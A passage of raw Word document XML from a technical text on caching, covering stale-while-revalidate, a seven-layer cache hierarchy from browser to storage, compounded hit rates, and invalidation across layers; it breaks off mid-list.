    <w:p w14:paraId="702D6F0D" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The key characteristic:</w:t>
      </w:r>
      <w:r w:rsidRPr="008A51E9">
        <w:t> The stale-while-revalidate approach </w:t>
      </w:r>
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>never makes a request wait</w:t>
      </w:r>
      <w:r w:rsidRPr="008A51E9">
        <w:t> for revalidation. Every request immediately receives either a fresh or stale response. Revalidation happens asynchronously and only once per revalidation window — no thundering herd, no wait latency.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A0A37EA" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The staleness window</w:t>
      </w:r>
      <w:r w:rsidRPr="008A51E9">
        <w:t> (stale_ttl) bounds how stale data can become: max_age + stale_ttl seconds. After this combined window, the entry is completely expired and requests must wait for revalidation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="150FDEF5" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:pict w14:anchorId="1B1EE200">
          <v:rect id="_x0000_i4793" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CE91368" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>6. Multi-Layer Caching Architectures</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="349A2B50" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The Complete Cache Hierarchy in a Real System</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="197C6E30" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>A production web application typically has 5–7 caching layers, each with different characteristics:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="559BDDE9" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="579D0F81" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>Browser Cache (L1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F68BC3A" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">  Storage: Browser disk/memory</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3009DA48" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">  Scope: Single user's browser</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0507D480" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">  TTL: Cache-Control max-age (seconds to years)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="186FEBE6" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">  Latency: 0ms (served from local disk/memory)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18B98F47" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">  Size: 50MB–500MB per browser</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21BA5D87" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">  Eviction: Browser-managed LRU</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05A2C981" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9"/>
    <w:p w14:paraId="51191BF3" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>CDN Edge Cache (L2)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B521B0F" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">  Storage: CDN PoP SSD/RAM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27E4E9DD" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  Scope: Regional (all users in a geographic area)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13EC8DD8" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">  TTL: Cache-Control max-age + CDN TTL override rules</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="750A40AD" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">  Latency: 1–10ms (nearest PoP)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2560294E" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">  Size: TB per PoP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="751D63EF" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">  Eviction: CDN-managed LRU/LFUDA</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="038FB66C" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9"/>
    <w:p w14:paraId="3B56049B" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>Application-Level Cache (L3) [e.g., Guava, Caffeine, in-process]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DFB9110" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">  Storage: Application server heap</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66F8FC16" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">  Scope: Single application server instance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78EBB9C5" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">  TTL: Configured per cache definition</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0642BC59" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">  Latency: ~100ns (in-process memory access)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49404686" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">  Size: 100MB–8GB (fraction of JVM/process heap)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41DE5241" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">  Eviction: W-TinyLFU or LRU (library-dependent)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09065DB6" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9"/>
    <w:p w14:paraId="5445B747" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>Distributed Cache (L4) [e.g., Redis, Memcached]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1195066C" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">  Storage: Cache server RAM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D2418BB" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">  Scope: All application server instances sharing the cache</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CD579F4" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">  TTL: EXPIRE command per key</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74B44C12" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">  Latency: 0.1–2ms (network round-trip)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43D744DA" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">  Size: GB to TB (horizontally scalable via clustering)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="347931D8" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">  Eviction: allkeys-lru/lfu, volatile-lru/lfu</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2879EC5C" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9"/>
    <w:p w14:paraId="686D446F" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>Database Buffer Pool (L5) [e.g., PostgreSQL shared_buffers, MySQL InnoDB buffer pool]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42E74D4F" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">  Storage: Database server RAM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E8DBA9F" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">  Scope: All queries through this database server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E3D4751" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">  TTL: Managed by database (dirty page flushing, LRU eviction)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FE5DB4B" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  Latency: ~60ns (RAM) vs ~100µs (NVMe SSD) for misses</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="601AC986" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">  Size: Configured as fraction of DB server RAM (25–75%)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EB20E7D" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">  Eviction: Clock-Pro (PostgreSQL), LRU variants (MySQL)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FE2D86F" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9"/>
    <w:p w14:paraId="0C95DA17" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>OS Page Cache (L6)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BDC6DEF" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">  Storage: Any server's unused RAM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="027251E7" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">  Scope: All processes on that OS instance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76BCC9EE" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">  TTL: Managed by OS (LRU eviction under memory pressure)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="439BA673" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">  Latency: ~60ns vs ~100µs (SSD) for miss</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="454D656A" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">  Size: All unused RAM (automatically uses available memory)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="453872F7" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">  Eviction: CLOCK-Pro (Linux), two-list LRU (Linux page cache)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="219F574E" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9"/>
    <w:p w14:paraId="78E5228D" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>Storage (L7) [SSD/HDD]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="096B658D" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">  Latency: ~100µs (NVMe SSD), ~10ms (HDD)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78237C1B" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">  Size: Unlimited (cost-bound)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="045D0642" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">  No eviction — persistent</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FC5BB8F" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The cache hit compound effect:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FB955E2" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>If each layer has 90% hit rate, and misses fall through to the next layer:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64209F88" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52951BD7" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>Layer 1 (browser): 90% hit → 10% reach Layer 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D59F57A" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>Layer 2 (CDN):     90% hit → 1% reach Layer 3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F2B1227" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>Layer 3 (app):     90% hit → 0.1% reach Layer 4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72642AEC" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>Layer 4 (Redis):   90% hit → 0.01% reach Layer 5 (DB)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07CF87E3" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9"/>
    <w:p w14:paraId="3F9CD586" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>99.99% of requests served without hitting the database.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EB84925" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>DB serves only 0.01% of requests.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EDB1DFA" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:lastRenderedPageBreak/>
        <w:t>In practice, hit rates vary by layer and workload, but the compounding effect demonstrates why layered caching is so powerful — each layer's hit rate multiplies the previous layers' protection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="371A04AB" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Cache Coherence Across Layers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C31EFE8" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The consistency problem in layered caches:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22CD84AE" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>When data changes in the backing store, all layers must eventually reflect the change. In a 6-layer hierarchy, invalidation must propagate through all layers that cached the stale data:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4167C22E" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="449136AD" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>Product price changes:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11EB6E21" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">  L7 (DB): Updated immediately</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FECB551" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">  L6 (page cache): Updated immediately (DB write goes through page cache)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06F4A94A" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">  L5 (DB buffer): Updated immediately (dirty page in buffer pool)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="730F2C95" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">  L4 (Redis): Must explicitly invalidate</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="282E52E1" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">  L3 (app in-process): Must explicitly invalidate</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="142E5A3B" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">  L2 (CDN): Must purge via CDN API</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="514850C4" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">  L1 (browser): Cannot invalidate directly (TTL expiry only)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E4F460B" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The practical invalidation approach:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="223F01D8" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1362"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>DB + page cache + buffer:</w:t>
      </w:r>
      <w:r w:rsidRPr="008A51E9">
        <w:t> Consistent automatically (no explicit invalidation needed).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="663679E2" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1362"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Redis:</w:t>
      </w:r>
      <w:r w:rsidRPr="008A51E9">
        <w:t> Explicit delete on write. Or CDC-based invalidation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52EEB8B4" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1362"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>In-process cache:</w:t>
      </w:r>
      <w:r w:rsidRPr="008A51E9">
        <w:t> Short TTL (seconds to minutes) or listen to Redis Pub/Sub for invalidation events.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B30B6EC" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1362"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>CDN:</w:t>
      </w:r>
      <w:r w:rsidRPr="008A51E9">
        <w:t> Short TTL (60–300s) or explicit purge API call. CDN API calls add latency to the write path.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06E633EF" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1362"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Browser:</w:t>
      </w:r>
      <w:r w:rsidRPr="008A51E9">
